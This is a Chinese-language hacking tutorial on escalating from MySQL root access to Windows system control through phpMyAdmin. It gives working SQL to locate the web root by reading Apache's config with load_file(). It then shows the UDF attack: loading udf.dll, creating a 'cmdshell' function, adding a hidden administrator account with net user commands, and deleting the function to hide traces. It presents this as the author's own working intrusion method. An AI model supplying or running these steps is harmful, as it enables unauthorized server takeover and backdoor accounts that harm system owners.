|
这里主要方法有好几种,我就说说常用的两种
一种是:通过另外的途径获得网站根目录
一种是:通过phpmyadmin win下提权方法
通过另外的途径获得网站根目录
案例:通过网站备份获取到root密码,但是得不到路径。
这里我们的思路就有千方百计的获得网站根目录路径,例如:phpinfo.php phpmyadmin爆路径,cms爆路径,kindeditor爆路径漏洞等,或者注入文件报错?...
当然,我们获取到root权限并连接上找不到路径,我一般开始都是使用:select @@datadir 这个函数获取到mysql安装的路径
先看服务器基本信息
select @@datadir
这里看到:这台服务器用的wamp mysql5.520版本的。
那么我现在的思路就是获取到网站的根目录.通过前面信息,我们可以通过寻找阿帕奇的配置文件得到网站路径。
通过前面的mysql安装路径:d:\wamp\bin\mysql\mysql5.5.20\data\,
看前面的信息: Apache/2.2.21 (Win32) PHP/5.3.10
我们可以这样猜想Apache的路径:“d:\wamp\bin\Apache\Apache 2.2.21\conf\httpd.conf”
SELECT load_file( 'd:/wamp/bin/Apache/Apache 2.2.21/conf/httpd.conf' )
读取不到,这里去掉空格看看?
SELECT load_file( 'd:/wamp/bin/Apache/Apache2.2.21/conf/httpd.conf' )
通过阿帕奇配置文件找到网站路径:d:\wamp\www
其实这里只是为了找到这个网站路径铺路,我们前面可以这样子想网站根目录是"d:\wamp\wwwroot\" "d:\wamp\www" "d:\wamp\www\域名" "d:\wamp\域名"等。
通过phpmyadmin win下提权方法
关于phpmyadmin 下提权,网上也有案例,这里我就讲讲我的方法。
关于:udf.dll提权 前提,mysql root权限 mysql udf提权 5.0以下的要导出到c:\windows\ 或者c:\windows\system32目录下 mysql版本大于5.0的 要导出到*:\MYSQL\lib\plugin目录下;
第一:
select @@basedir; 查mysql路径
例如:d:\wamp\bin\mysql\mysql5.5.20\data\
第二:通过phpmyadmin导入功能导入udf.dll
改下导出的路径。
使用phpmyadmin 功能导入;
第三:这个时候就可以创建cmdshell函数了
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user test test123 /add');
select cmdshell('net localgroup administrators test /add');
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数
最后附图:
|
|